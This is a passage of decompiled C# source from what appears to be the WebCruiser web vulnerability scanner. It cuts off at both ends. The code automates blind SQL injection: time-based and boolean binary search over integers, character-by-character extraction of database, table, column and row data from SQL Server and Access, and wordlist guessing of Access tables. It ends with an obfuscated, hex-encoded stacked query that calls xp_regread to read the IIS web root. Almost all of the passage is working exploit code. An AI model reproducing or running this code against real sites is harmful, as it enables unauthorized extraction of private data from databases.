					uRL = URL + PreFix + "%20" + LogicOperator + "%20if((" + IntSQLExpression + ")=" + (MaxNum + MinNum) / 2 + PostFix;
					mainfrm.CurrentSite.GetSourceCodeAndMilliSeconds(uRL, vulnSQL.vulnRequestType, out respMilliSeconds, vulnSQL.vulnPostEncType);
					num6 = respMilliSeconds - vulnSQL.t0InMs;
					if (num6 > 700.0)
					{
						result = (MaxNum + MinNum) / 2;
						mainfrm.DisplayLogList("Got Int: " + result);
						return result;
					}
					uRL = URL + PreFix + "%20" + LogicOperator + "%20if((" + IntSQLExpression + ")<" + (MaxNum + MinNum) / 2 + PostFix;
					mainfrm.CurrentSite.GetSourceCodeAndMilliSeconds(uRL, vulnSQL.vulnRequestType, out respMilliSeconds, vulnSQL.vulnPostEncType);
					num6 = respMilliSeconds - vulnSQL.t0InMs;
					if (!(num6 > 700.0))
					{
						MinNum = ((MinNum != (MaxNum + MinNum) / 2) ? ((MaxNum + MinNum) / 2 + 1) : (MinNum + 1));
					}
					else
					{
						MaxNum = (MaxNum + MinNum) / 2 - 1;
					}
				}
				while (MinNum <= MaxNum);
				mainfrm.DisplayLogList("Got Int: " + result);
				return result;
			}
			mainfrm.CurrentSite.CurrentKeyWord = GetKeyWord(URL, skipScanned: true);
			if (string.IsNullOrEmpty(mainfrm.CurrentSite.CurrentKeyWord))
			{
				return -1;
			}
			string text = "";
			string text2 = "";
			int result2 = -1;
			text = URL + PreFix + "%20" + LogicOperator + "%20(" + IntSQLExpression + ")>" + MaxNum + PostFix;
			text2 = mainfrm.CurrentSite.GetSourceCodeWithEscapeSpaceOption(text, mainfrm.ReqType, vulnSQL.needEscapeSpace, vulnSQL.vulnPostEncType);
			if (isIncludeCurrentKeyword(text2))
			{
				return -1;
			}
			do
			{
				text = URL + PreFix + "%20" + LogicOperator + "%20(" + IntSQLExpression + ")=" + (MaxNum + MinNum) / 2 + PostFix;
				text2 = mainfrm.CurrentSite.GetSourceCodeWithEscapeSpaceOption(text, mainfrm.ReqType, vulnSQL.needEscapeSpace, vulnSQL.vulnPostEncType);
				if (string.IsNullOrEmpty(text2))
				{
					text2 = mainfrm.CurrentSite.GetSourceCodeWithEscapeSpaceOption(text, mainfrm.ReqType, vulnSQL.needEscapeSpace, vulnSQL.vulnPostEncType);
				}
				if (isIncludeCurrentKeyword(text2))
				{
					return (MaxNum + MinNum) / 2;
				}
				text = URL + PreFix + "%20" + LogicOperator + "%20(" + IntSQLExpression + ")<" + (MaxNum + MinNum) / 2 + PostFix;
				text2 = mainfrm.CurrentSite.GetSourceCodeWithEscapeSpaceOption(text, mainfrm.ReqType, vulnSQL.needEscapeSpace, vulnSQL.vulnPostEncType);
				if (!isIncludeCurrentKeyword(text2))
				{
					MinNum = ((MinNum != (MaxNum + MinNum) / 2) ? ((MaxNum + MinNum) / 2 + 1) : (MinNum + 1));
				}
				else
				{
					MaxNum = (MaxNum + MinNum) / 2 - 1;
				}
			}
			while (MinNum <= MaxNum);
			mainfrm.DisplayLogList("Got Int: " + result2);
			return result2;
		}

		private string GetItemBySQLServer(string SelectExpression, string ItemName, string FromExpression, int MaxChar, int MaxLength, bool NeedTempTable)
		{
			string text = "";
			try
			{
				if (WebSite.CurrentStatus == TaskStatus.Stop)
				{
					return "";
				}
				if (mainfrm.CurrentSite.injectMethod == InjectMethod.ToBeDetect)
				{
					GetInjectMethod(URL);
				}
				if (mainfrm.CurrentSite.injectMethod == InjectMethod.ErrorBased)
				{
					text = GetItemBySQLServerPlainText(ItemName);
					mainfrm.DisplayLogList("Got : " + text);
					if (!string.IsNullOrEmpty(text))
					{
						return text;
					}
				}
				else if (mainfrm.CurrentSite.injectMethod == InjectMethod.UnionBased)
				{
					text = GetItemByFieldEcho(SelectExpression, ItemName, FromExpression, NeedTempTable);
					if (!string.IsNullOrEmpty(text))
					{
						return text;
					}
				}
				mainfrm.CurrentSite.CurrentKeyWord = GetKeyWord(URL, skipScanned: true);
				if (string.IsNullOrEmpty(mainfrm.CurrentSite.CurrentKeyWord))
				{
					return "";
				}
				int intValue = GetIntValue(SelectExpression + "%20len(" + ItemName + ")%20" + FromExpression, MaxLength, 0);
				mainfrm.DisplayLogList("Got Length: " + intValue);
				if (intValue < 1)
				{
					return "";
				}
				for (int i = 0; i < intValue; i++)
				{
					int intValue2 = GetIntValue(SelectExpression + "%20ASCII(SUBSTRING(" + ItemName + "," + (i + 1) + ",1))%20" + FromExpression, MaxChar, 0);
					char c = (char)intValue2;
					text = ((c <= '\u007f') ? (text + c) : (text + (char)GetIntValue(SelectExpression + "%20UNICODE(SUBSTRING(" + ItemName + "," + (i + 1) + ",1))%20" + FromExpression, 65535, 128)));
					mainfrm.DisplayLogList("Got " + text.Length + "/" + intValue + " :  " + text);
				}
				return text;
			}
			catch
			{
				return text;
			}
		}

		private void ExecSQLServerGetDB()
		{
			mainfrm.DisplayLogList("Getting DB ...");
			if (cmbChkAllDB.get_SelectedIndex() == 0)
			{
				string itemBySQLServer = GetItemBySQLServer("select", "db_name()", "", 255, 128, NeedTempTable: false);
				if (!string.IsNullOrEmpty(itemBySQLServer))
				{
					AddDB2TreeView(itemBySQLServer);
					CurrentDBName = itemBySQLServer;
				}
				return;
			}
			int intValue = GetIntValue("select%20count(1)%20from%20[master]..[sysdatabases]", 128, 0);
			mainfrm.DisplayLogList("Got DB Num: " + intValue);
			if (intValue >= 1)
			{
				for (int i = 0; i < intValue; i++)
				{
					ThreadPool.QueueUserWorkItem(new WaitCallback(GetDBDoWork), i + 1);
				}
			}
		}

		private void GetDBDoWork(object data)
		{
			try
			{
				if (WebSite.CurrentStatus != TaskStatus.Stop)
				{
					string itemBySQLServer = GetItemBySQLServer("select", "name", "from%20[master]..[sysdatabases]%20where dbid=" + (int)data, 255, 128, NeedTempTable: false);
					AddDB2TreeView(itemBySQLServer);
				}
			}
			catch
			{
			}
		}

		private int GetTreeViewDBCount(string TreeInfo)
		{
			try
			{
				if (!((Control)treeViewDB).get_InvokeRequired())
				{
					if (string.IsNullOrEmpty(TreeInfo))
					{
						return treeViewDB.get_Nodes().get_Count();
					}
					string[] array = TreeInfo.Split(new char[1]
					{
						'^'
					});
					switch (array.Length - 1)
					{
					case 0:
					{
						int num3 = int.Parse(array[0]);
						return treeViewDB.get_Nodes().get_Item(num3).get_Nodes()
							.get_Count();
					}
					case 1:
					{
						int num = int.Parse(array[0]);
						int num2 = int.Parse(array[1]);
						return treeViewDB.get_Nodes().get_Item(num).get_Nodes()
							.get_Item(num2)
							.get_Nodes()
							.get_Count();
					}
					default:
						return 0;
					}
				}
				GetTreeCount getTreeCount = GetTreeViewDBCount;
				return (int)((Control)this).Invoke((Delegate)getTreeCount, new object[1]
				{
					TreeInfo
				});
			}
			catch
			{
				return 0;
			}
		}

		private bool TreeViewDBChecked(string TreeInfo)
		{
			if (!((Control)treeViewDB).get_InvokeRequired())
			{
				string[] array = TreeInfo.Split(new char[1]
				{
					'^'
				});
				switch (array.Length - 1)
				{
				case 0:
				{
					int num6 = int.Parse(array[0]);
					return treeViewDB.get_Nodes().get_Item(num6).get_Checked();
				}
				case 1:
				{
					int num4 = int.Parse(array[0]);
					int num5 = int.Parse(array[1]);
					return treeViewDB.get_Nodes().get_Item(num4).get_Nodes()
						.get_Item(num5)
						.get_Checked();
				}
				case 2:
				{
					int num = int.Parse(array[0]);
					int num2 = int.Parse(array[1]);
					int num3 = int.Parse(array[2]);
					return treeViewDB.get_Nodes().get_Item(num).get_Nodes()
						.get_Item(num2)
						.get_Nodes()
						.get_Item(num3)
						.get_Checked();
				}
				default:
					return false;
				}
			}
			TreeChecked treeChecked = TreeViewDBChecked;
			return (bool)((Control)this).Invoke((Delegate)treeChecked, new object[1]
			{
				TreeInfo
			});
		}

		private void ExecSQLServerGetTable(object data)
		{
			try
			{
				if (WebSite.CurrentStatus == TaskStatus.Stop)
				{
					return;
				}
				mainfrm.DisplayLogList("Getting Tables ...");
				_ = DateTime.Now;
				string text = "";
				int treeViewDBCount = GetTreeViewDBCount("");
				for (int i = 0; i < treeViewDBCount; i++)
				{
					if (WebSite.CurrentStatus == TaskStatus.Stop)
					{
						break;
					}
					if (TreeViewDBChecked(i.ToString()))
					{
						text = GetTreeViewDBText(i.ToString());
						int num = GetIntValue("select count(1) from [" + text + "]..[sysobjects] where xtype=0x55  and name not like 0x570043005200540045004D0050002500", 256, 0);
						if (num < 0)
						{
							num = GetIntValue("select count(1) from [sysobjects] where xtype=0x55  and name not like 0x570043005200540045004D0050002500", 256, 0);
						}
						mainfrm.DisplayLogList("Got Table Num: " + num);
						if (num < 0)
						{
							num = 256;
						}
						string[] array = new string[num];
						for (int j = 0; j < num; j++)
						{
							array[j] = i + "^" + (j + 1) + "^" + text;
							ThreadPool.QueueUserWorkItem(new WaitCallback(GetTableDoWork), array[j]);
						}
						break;
					}
				}
			}
			catch
			{
			}
		}

		private void AddTable2TreeView(string IndexAndNodeText)
		{
			int num = int.Parse(IndexAndNodeText.Split(new char[1]
			{
				'^'
			})[0]);
			string text = IndexAndNodeText.Split(new char[1]
			{
				'^'
			})[1];
			if (!string.IsNullOrEmpty(text))
			{
				if (!((Control)treeViewDB).get_InvokeRequired())
				{
					TreeNode val = treeViewDB.get_Nodes().get_Item(num).get_Nodes()
						.Add(text);
					val.set_ImageKey("table.png");
					treeViewDB.ExpandAll();
					((Control)treeViewDB).Refresh();
				}
				else
				{
					dd dd = AddTable2TreeView;
					((Control)this).Invoke((Delegate)dd, new object[1]
					{
						IndexAndNodeText
					});
				}
			}
		}

		private void AddColumn2TreeView(string IndexAndNodeText)
		{
			if (!((Control)treeViewDB).get_InvokeRequired())
			{
				string[] array = IndexAndNodeText.Split(new char[1]
				{
					'^'
				});
				int num = int.Parse(array[0]);
				int num2 = int.Parse(array[1]);
				string text = array[2];
				if (!string.IsNullOrEmpty(text))
				{
					TreeNode val = treeViewDB.get_Nodes().get_Item(num).get_Nodes()
						.get_Item(num2)
						.get_Nodes()
						.Add(text);
					val.set_ImageKey("column.png");
					treeViewDB.ExpandAll();
					((Control)treeViewDB).Refresh();
				}
			}
			else
			{
				dd dd = AddColumn2TreeView;
				((Control)this).Invoke((Delegate)dd, new object[1]
				{
					IndexAndNodeText
				});
			}
		}

		private void GetTableDoWork(object data)
		{
			try
			{
				if (WebSite.CurrentStatus != TaskStatus.Stop)
				{
					string text = (string)data;
					string[] array = text.Split(new char[1]
					{
						'^'
					});
					string text2 = array[1];
					string text3 = array[2];
					string itemBySQLServer = GetItemBySQLServer("select%20top%201%20", "name", " from(Select top " + text2 + " id,name from [" + text3 + "]..[sysobjects] where xtype=0x55  and name not like 0x570043005200540045004D0050002500 order by id) T order by id desc", 255, 128, NeedTempTable: false);
					AddTable2TreeView(array[0] + "^" + itemBySQLServer);
				}
			}
			catch
			{
			}
		}

		private string DecodeDatabaseSpecificString(string encodedString)
		{
			//IL_0304: Unknown result type (might be due to invalid IL or missing references)
			try
			{
				if (mainfrm.CurrentSite.DatabaseType == DBType.SQLServer)
				{
					if (Regex.IsMatch(encodedString, "0x[0-9a-fA-F]+"))
					{
						byte[] array = new byte[encodedString.Length / 2 - 1];
						for (int i = 0; i < array.Length; i++)
						{
							string s = encodedString.Substring(i * 2 + 2, 2);
							array[i] = byte.Parse(s, NumberStyles.HexNumber, CultureInfo.InvariantCulture);
						}
						return Encoding.Unicode.GetString(array);
					}
					string[] array2 = Regex.Split(encodedString, "%2B");
					char[] array3 = new char[array2.Length];
					for (int j = 0; j < array2.Length; j++)
					{
						string value = ((Capture)Regex.Match(array2[j], "\\d+")).get_Value();
						array3[j] = (char)uint.Parse(value);
					}
					return new string(array3);
				}
				if (mainfrm.CurrentSite.DatabaseType == DBType.MySQL)
				{
					byte[] array4 = new byte[encodedString.Length / 2 - 1];
					for (int k = 0; k < array4.Length; k++)
					{
						string s2 = encodedString.Substring(k * 2 + 2, 2);
						array4[k] = byte.Parse(s2, NumberStyles.HexNumber, CultureInfo.InvariantCulture);
					}
					return mainfrm.CurrentSite.DBEncoding.GetString(array4);
				}
				if (mainfrm.CurrentSite.DatabaseType == DBType.Oracle || mainfrm.CurrentSite.DatabaseType == DBType.DB2 || mainfrm.CurrentSite.DatabaseType == DBType.PostgreSQL)
				{
					string[] array5 = Regex.Split(encodedString, "\\|\\|");
					byte[] array6 = new byte[array5.Length];
					for (int l = 0; l < array5.Length; l++)
					{
						string value2 = ((Capture)Regex.Match(array5[l], "\\d+")).get_Value();
						array6[l] = byte.Parse(value2, NumberStyles.Integer, CultureInfo.InvariantCulture);
					}
					return Encoding.UTF8.GetString(array6);
				}
				if (mainfrm.CurrentSite.DatabaseType == DBType.Access)
				{
					string[] array7 = Regex.Split(encodedString, "%2B");
					byte[] array8 = new byte[array7.Length];
					for (int m = 0; m < array7.Length; m++)
					{
						string value3 = ((Capture)Regex.Match(array7[m], "\\d+")).get_Value();
						array8[m] = byte.Parse(value3, NumberStyles.Integer, CultureInfo.InvariantCulture);
					}
					return Encoding.UTF8.GetString(array8);
				}
				if (mainfrm.CurrentSite.DatabaseType == DBType.SQLite)
				{
					string[] array9 = Regex.Split(encodedString, ",");
					byte[] array10 = new byte[array9.Length];
					for (int n = 0; n < array9.Length; n++)
					{
						string value4 = ((Capture)Regex.Match(array9[n], "\\d+")).get_Value();
						array10[n] = byte.Parse(value4, NumberStyles.Integer, CultureInfo.InvariantCulture);
					}
					return Encoding.UTF8.GetString(array10);
				}
				return "";
			}
			catch (Exception ex)
			{
				MessageBox.Show(ex.Message, "Notice");
				return encodedString;
			}
		}

		private void ExecSQLServerGetColumn(object data)
		{
			string text = "";
			string text2 = "";
			int treeViewDBCount = GetTreeViewDBCount("");
			for (int i = 0; i < treeViewDBCount; i++)
			{
				if (!TreeViewDBChecked(i.ToString()))
				{
					continue;
				}
				text = GetTreeViewDBText(i.ToString());
				int treeViewDBCount2 = GetTreeViewDBCount(i.ToString());
				for (int j = 0; j < treeViewDBCount2; j++)
				{
					if (!TreeViewDBChecked(i + "^" + j))
					{
						continue;
					}
					mainfrm.DisplayLogList("Getting Columns ...");
					string text3 = "";
					text2 = GetTreeViewDBText(i + "^" + j);
					int num = GetIntValue("select count(1) from [" + text + "].information_schema.columns where table_name=" + mainfrm.CurrentSite.EscapeSingleQuotes(text2, DBType.SQLServer), 128, 0);
					mainfrm.DisplayLogList("Got Column Num: " + num);
					if (num < 1)
					{
						if (text.Equals(CurrentDBName))
						{
							int num2 = 1;
							while (true)
							{
								string itemBySQLServer = GetItemBySQLServer("select", "col_name(object_id(" + mainfrm.CurrentSite.EscapeSingleQuotes(text2, DBType.SQLServer) + ")," + num2 + ")", "", 255, 128, NeedTempTable: false);
								if (string.IsNullOrEmpty(itemBySQLServer))
								{
									break;
								}
								AddColumn2TreeView(i + "^" + j + "^" + itemBySQLServer);
								num2++;
							}
							return;
						}
						num = 128;
					}
					for (int k = 0; k < num; k++)
					{
						text3 = i + "^" + j + "^" + (k + 1) + "^" + text + "^" + text2;
						ThreadPool.QueueUserWorkItem(new WaitCallback(SQLServerGetColumnDoWork), text3);
					}
					break;
				}
			}
		}

		private void SQLServerGetColumnDoWork(object data)
		{
			try
			{
				string text = (string)data;
				string[] array = text.Split(new char[1]
				{
					'^'
				});
				string text2 = array[0];
				string text3 = array[1];
				string text4 = array[2];
				string text5 = array[3];
				string itemName = array[4];
				string itemBySQLServer = GetItemBySQLServer("select%20top%201%20", "column_name", " from [" + text5 + "].information_schema.columns where table_name=" + mainfrm.CurrentSite.EscapeSingleQuotes(itemName, DBType.SQLServer) + "%20and ordinal_position=" + text4, 255, 128, NeedTempTable: false);
				AddColumn2TreeView(text2 + "^" + text3 + "^" + itemBySQLServer);
			}
			catch
			{
			}
		}

		private void ExecSQLServerGetData(int RowsBegin, int RowsEnd)
		{
			//IL_002a: Unknown result type (might be due to invalid IL or missing references)
			//IL_0030: Expected O, but got Unknown
			//IL_005b: Unknown result type (might be due to invalid IL or missing references)
			//IL_0061: Expected O, but got Unknown
			//IL_00a1: Unknown result type (might be due to invalid IL or missing references)
			//IL_00a8: Expected O, but got Unknown
			//IL_018e: Unknown result type (might be due to invalid IL or missing references)
			//IL_01ce: Unknown result type (might be due to invalid IL or missing references)
			string text = "";
			string text2 = "";
			foreach (TreeNode node in treeViewDB.get_Nodes())
			{
				TreeNode val = node;
				if (!val.get_Checked())
				{
					continue;
				}
				text = val.get_Text();
				foreach (TreeNode node2 in val.get_Nodes())
				{
					TreeNode val2 = node2;
					if (!val2.get_Checked())
					{
						continue;
					}
					text2 = val2.get_Text();
					string text3 = "";
					string text4 = "";
					string text5 = "";
					foreach (TreeNode node3 in val2.get_Nodes())
					{
						TreeNode val3 = node3;
						if (val3.get_Checked())
						{
							if (string.IsNullOrEmpty(text3))
							{
								text5 = "[" + val3.get_Text() + "]";
							}
							else
							{
								text3 += "%2Bchar(94)%2B";
								text4 += ",";
							}
							text3 = text3 + "isnull(cast([" + val3.get_Text() + "] as nvarchar(4000)),char(32))";
							text4 = text4 + "[" + val3.get_Text() + "]";
						}
					}
					int intValue = GetIntValue("select count(1) from [" + text + "]..[" + text2 + "]", RowsEnd, 0);
					if (intValue == 0)
					{
						MessageBox.Show("No Records Found!");
						break;
					}
					if (intValue > 0 && intValue < RowsEnd)
					{
						RowsEnd = intValue;
						((ToolStripItem)txtRowsEnd).set_Text(intValue.ToString());
					}
					if (RowsBegin > RowsEnd)
					{
						MessageBox.Show("* Exceed Records Range!\r\n* The Rows Num=" + intValue);
						break;
					}
					for (int i = RowsBegin - 1; i < RowsEnd; i++)
					{
						string text6 = "";
						ThreadPool.QueueUserWorkItem(state: (!text.Equals(CurrentDBName)) ? (text3 + "^" + i + "^" + text4 + "^[" + text + "]..[" + text2 + "]^" + text5) : (text3 + "^" + i + "^" + text4 + "^[" + text2 + "]^" + text5), callBack: new WaitCallback(SQLServerGetDataDoWork));
					}
					break;
				}
				break;
			}
		}

		private void AddItem2ListViewData(string ItemText)
		{
			if (!((Control)listViewData).get_InvokeRequired())
			{
				string[] array = ItemText.Split(new char[1]
				{
					'^'
				});
				ListViewItem val = listViewData.get_Items().Add(array[0]);
				try
				{
					for (int i = 1; i < listViewData.get_Columns().get_Count(); i++)
					{
						val.get_SubItems().Add(array[i]);
					}
					((Control)listViewData).Refresh();
				}
				catch
				{
				}
			}
			else
			{
				dd dd = AddItem2ListViewData;
				((Control)this).Invoke((Delegate)dd, new object[1]
				{
					ItemText
				});
			}
		}

		private void SQLServerGetDataDoWork(object data)
		{
			try
			{
				string[] array = ((string)data).Split(new char[1]
				{
					'^'
				});
				string itemName = array[0];
				int num = int.Parse(array[1]);
				string text = array[2];
				string text2 = array[3];
				string text3 = array[4];
				string itemBySQLServer = GetItemBySQLServer("select%20top%201%20", itemName, "from (select top " + (num + 1) + " " + text + " from " + text2 + " order by " + text3 + ") T order by " + text3 + " desc", 255, 1024, NeedTempTable: true);
				AddItem2ListViewData(itemBySQLServer);
			}
			catch
			{
			}
		}

		private string GetItemByAccess(string SelectExpression, string ItemName, string FromExpression, int MaxChar, int MaxLength)
		{
			string text = "";
			try
			{
				if (mainfrm.CurrentSite.injectMethod == InjectMethod.ToBeDetect)
				{
					GetInjectMethod(URL);
				}
				if (mainfrm.CurrentSite.injectMethod == InjectMethod.UnionBased)
				{
					text = GetItemByFieldEcho(SelectExpression, ItemName, FromExpression, NeedTempTable: false);
					if (!string.IsNullOrEmpty(text))
					{
						return text;
					}
				}
				mainfrm.CurrentSite.CurrentKeyWord = GetKeyWord(URL, skipScanned: true);
				if (string.IsNullOrEmpty(mainfrm.CurrentSite.CurrentKeyWord))
				{
					return "";
				}
				int intValue = GetIntValue(SelectExpression + "%20len(" + ItemName + ")%20" + FromExpression, MaxLength, 0);
				mainfrm.DisplayLogList("Got Length: " + intValue);
				if (intValue < 1)
				{
					return "";
				}
				for (int i = 0; i < intValue; i++)
				{
					char c = (char)GetIntValue(SelectExpression + "%20ASC(MID(" + ItemName + "," + (i + 1) + ",1))%20" + FromExpression, MaxChar, 0);
					text += c;
					mainfrm.DisplayLogList("Got " + text.Length + "/" + intValue + " :  " + text);
				}
				return text;
			}
			catch
			{
				return text;
			}
		}

		private int GetListViewCount(ListView lv)
		{
			if (!((Control)lv).get_InvokeRequired())
			{
				return lv.get_Items().get_Count();
			}
			ddGetListViewCount ddGetListViewCount = GetListViewCount;
			return (int)((Control)this).Invoke((Delegate)ddGetListViewCount, new object[1]
			{
				lv
			});
		}

		private bool IsListViewEnvCheckedAt(int Index)
		{
			if (!((Control)listViewEnv).get_InvokeRequired())
			{
				return listViewEnv.get_Items().get_Item(Index).get_Checked();
			}
			dd2 dd = IsListViewEnvCheckedAt;
			return (bool)((Control)this).Invoke((Delegate)dd, new object[1]
			{
				Index
			});
		}

		private string ReadListViewInfoItems(int Index)
		{
			if (!((Control)listViewEnv).get_InvokeRequired())
			{
				return listViewEnv.get_Items().get_Item(Index).get_Text();
			}
			dd3 dd = ReadListViewInfoItems;
			return (string)((Control)this).Invoke((Delegate)dd, new object[1]
			{
				Index
			});
		}

		private string GetServer(string sURL)
		{
			try
			{
				string urlencodedPostData = "";
				string customCookie = "";
				if (mainfrm.ReqType != 0)
				{
					int num = URL.IndexOf('^');
					string text = URL.Substring(num + 1);
					if (mainfrm.ReqType == RequestType.POST)
					{
						urlencodedPostData = text;
					}
					else if (mainfrm.ReqType == RequestType.COOKIE)
					{
						customCookie = text;
					}
				}
				HttpWebResponse httpWebResponse = mainfrm.CurrentSite.GetHttpWebResponse(URL, mainfrm.ReqType, urlencodedPostData, "", customCookie, WebSite.EscapeCookie, "", "");
				string result = httpWebResponse.get_Server().ToString();
				((WebResponse)httpWebResponse).Close();
				httpWebResponse = null;
				return result;
			}
			catch
			{
				return "";
			}
		}

		private void AddSubItem2ListViewInfo(string IndexItemText)
		{
			if (!((Control)listViewEnv).get_InvokeRequired())
			{
				string[] array = IndexItemText.Split(new char[1]
				{
					'^'
				});
				int num = int.Parse(array[0]);
				string text = array[1];
				if (listViewEnv.get_Items().get_Item(num).get_SubItems()
					.get_Count() > 1)
				{
					listViewEnv.get_Items().get_Item(num).get_SubItems()
						.RemoveAt(1);
				}
				listViewEnv.get_Items().get_Item(num).get_SubItems()
					.Add(text);
				((Control)listViewEnv).Refresh();
			}
			else
			{
				dd dd = AddSubItem2ListViewInfo;
				((Control)this).Invoke((Delegate)dd, new object[1]
				{
					IndexItemText
				});
			}
		}

		private void ExecAccessCheck(object data)
		{
			int listViewCount = GetListViewCount(listViewEnv);
			for (int i = 0; i < listViewCount; i++)
			{
				if (!IsListViewEnvCheckedAt(i))
				{
					continue;
				}
				string text = ReadListViewInfoItems(i);
				if (mainfrm.CurrentSite.injectMethod == InjectMethod.ToBeDetect)
				{
					GetInjectMethod(URL);
				}
				if (text.Equals("Server"))
				{
					if (string.IsNullOrEmpty(Server))
					{
						Server = GetServer(URL);
					}
					if (string.IsNullOrEmpty(Server))
					{
						Server = "NULL";
					}
					AddSubItem2ListViewInfo(i + "^" + Server);
				}
			}
		}

		private void ExecAccessGetTable(object data)
		{
			try
			{
				if (string.IsNullOrEmpty(mainfrm.CurrentSite.CurrentKeyWord))
				{
					mainfrm.CurrentSite.CurrentKeyWord = GetKeyWord(URL, skipScanned: true);
				}
				if (string.IsNullOrEmpty(mainfrm.CurrentSite.CurrentKeyWord))
				{
					return;
				}
				if (mainfrm.CurrentSite.paramType == ParameterType.UnKnown)
				{
					mainfrm.CurrentSite.paramType = GetParameterType();
				}
				mainfrm.DisplayLogList("Getting Tables ...");
				string[] array = WebCruiserWVS.Default.AccessTables.Split(new char[1]
				{
					':'
				});
				int num = array.Length;
				for (int i = 0; i < num; i++)
				{
					string text = array[i];
					if (!string.IsNullOrEmpty(text))
					{
						ThreadPool.QueueUserWorkItem(new WaitCallback(AccessGetTableDoWork), text);
					}
				}
			}
			catch
			{
			}
		}

		private void AccessGetTableDoWork(object data)
		{
			try
			{
				string text = (string)data;
				string text2 = URL + PreFix + "%20" + LogicOperator + " (select count(1) from [" + text + "])>=0" + PostFix;
				string sourceCodeWithEscapeSpaceOption = mainfrm.CurrentSite.GetSourceCodeWithEscapeSpaceOption(text2, mainfrm.ReqType, vulnSQL.needEscapeSpace, vulnSQL.vulnPostEncType);
				if (string.IsNullOrEmpty(sourceCodeWithEscapeSpaceOption))
				{
					WebSite.DebugLog("GET  " + text2 + "  NULL");
				}
				else if (isIncludeCurrentKeyword(sourceCodeWithEscapeSpaceOption))
				{
					AddTable2TreeView("0^" + text);
					ExistedTableInAccess = text;
				}
			}
			catch
			{
			}
		}

		private void ExecAccessGetColumn(object data)
		{
			try
			{
				if (string.IsNullOrEmpty(mainfrm.CurrentSite.CurrentKeyWord))
				{
					mainfrm.CurrentSite.CurrentKeyWord = GetKeyWord(URL, skipScanned: true);
				}
				if (string.IsNullOrEmpty(mainfrm.CurrentSite.CurrentKeyWord))
				{
					return;
				}
				if (mainfrm.CurrentSite.paramType == ParameterType.UnKnown)
				{
					mainfrm.CurrentSite.paramType = GetParameterType();
				}
				string[] array = WebCruiserWVS.Default.AccessColumns.Split(new char[1]
				{
					':'
				});
				int num = array.Length;
				int treeViewDBCount = GetTreeViewDBCount("0");
				for (int i = 0; i < treeViewDBCount; i++)
				{
					if (!TreeViewDBChecked("0^" + i))
					{
						continue;
					}
					mainfrm.DisplayLogList("Getting Columns ...");
					string treeViewDBText = GetTreeViewDBText("0^" + i);
					for (int j = 0; j < num; j++)
					{
						string text = array[j];
						if (!string.IsNullOrEmpty(text))
						{
							string state = i + "^" + treeViewDBText + "^" + text;
							ThreadPool.QueueUserWorkItem(new WaitCallback(AccessGetColumnDoWork), state);
						}
					}
				}
			}
			catch
			{
			}
		}

		private void AccessGetColumnDoWork(object data)
		{
			try
			{
				string[] array = ((string)data).Split(new char[1]
				{
					'^'
				});
				if (array.Length >= 3)
				{
					string str = array[0];
					string text = array[1];
					string text2 = array[2];
					string text3 = URL + PreFix + "%20" + LogicOperator + " (select count([" + text2 + "]) from [" + text + "])>=0" + PostFix;
					string sourceCodeWithEscapeSpaceOption = mainfrm.CurrentSite.GetSourceCodeWithEscapeSpaceOption(text3, mainfrm.ReqType, vulnSQL.needEscapeSpace, vulnSQL.vulnPostEncType);
					if (string.IsNullOrEmpty(sourceCodeWithEscapeSpaceOption))
					{
						WebSite.DebugLog("GET  " + text3 + "  NULL");
					}
					else if (isIncludeCurrentKeyword(sourceCodeWithEscapeSpaceOption))
					{
						AddColumn2TreeView("0^" + str + "^" + text2);
					}
				}
			}
			catch
			{
			}
		}

		private void ExecAccessGetData(int RowsBegin, int RowsEnd)
		{
			//IL_0188: Unknown result type (might be due to invalid IL or missing references)
			//IL_01c8: Unknown result type (might be due to invalid IL or missing references)
			try
			{
				int treeViewDBCount = GetTreeViewDBCount("0");
				for (int i = 0; i < treeViewDBCount; i++)
				{
					if (!TreeViewDBChecked("0^" + i))
					{
						continue;
					}
					string treeViewDBText = GetTreeViewDBText("0^" + i);
					string text = "";
					string text2 = "";
					string text3 = "";
					int treeViewDBCount2 = GetTreeViewDBCount("0^" + i);
					for (int j = 0; j < treeViewDBCount2; j++)
					{
						if (TreeViewDBChecked("0^" + i + "^" + j))
						{
							string treeViewDBText2 = GetTreeViewDBText("0^" + i + "^" + j);
							if (string.IsNullOrEmpty(text))
							{
								text3 = "[" + treeViewDBText2 + "]";
							}
							else
							{
								text += "%2Bchr(94)%2B";
								text2 += ",";
							}
							text = text + "cstr([" + treeViewDBText2 + "])";
							text2 = text2 + "[" + treeViewDBText2 + "]";
						}
					}
					int num = 0;
					num = GetIntValueByAccess("select", "count(1)", "from [" + treeViewDBText + "]", RowsEnd, 0);
					mainfrm.DisplayLogList("Got Rows Num: " + num);
					if (num == 0)
					{
						MessageBox.Show("No Records Found!", "Information");
						break;
					}
					if (num > 0 && num < RowsEnd)
					{
						RowsEnd = num;
						((ToolStripItem)txtRowsEnd).set_Text(num.ToString());
					}
					if (RowsBegin > RowsEnd)
					{
						MessageBox.Show("* Exceed Records Range!\r\n* The Rows Num=" + num);
						break;
					}
					for (int k = RowsBegin - 1; k < RowsEnd; k++)
					{
						string state = text + "^" + k + "^" + text2 + "^[" + treeViewDBText + "]^" + text3;
						ThreadPool.QueueUserWorkItem(new WaitCallback(AccessGetDataDoWork), state);
					}
					break;
				}
			}
			catch
			{
			}
		}

		private void AccessGetDataDoWork(object data)
		{
			try
			{
				string[] array = ((string)data).Split(new char[1]
				{
					'^'
				});
				string itemName = array[0];
				int num = int.Parse(array[1]);
				string text = array[2];
				string text2 = array[3];
				string text3 = array[4];
				string itemByAccess = GetItemByAccess("select%20top%201%20", itemName, "from (select top " + (num + 1) + " " + text + " from " + text2 + " order by " + text3 + ") T order by " + text3 + " desc", 255, 1024);
				AddItem2ListViewData(itemByAccess);
			}
			catch
			{
			}
		}

		private string GetIISWebRoot(string URL)
		{
			TempTbNum++;
			string text = "WCRTEMP" + $"{TempTbNum:D5}";
			string uRL = URL + PreFix + ";create table " + text + "(tmp varchar(255))%3B%44%45%43%4C%41%52%45%20%40%70%20%76%61%72%63%68%61%72%28%32%35%35%29%3B%65%78%65%63%20%6D%61%73%74%65%72%2E%2E%78%70%5F%72%65%67%72%65%61%64%20%27%48%4B%45%59%5F%4C%4F%43%41%4C%5F%4D%41%43%48%49%4E%45%27%2C%27%53%4F%46%54%57%41%52%45%5C%4D%69%63%72%6F%73%6F%66%74%5C%49%6E%65%74%53%74%70%27%2C%20%27%50%61%74%68%57%57%57%52%6F%6F%74%27%2C%20%40%70%20%6F%75%74%70%75%74%3Binsert into " + text + "(tmp) values(@p);%2D%2D";
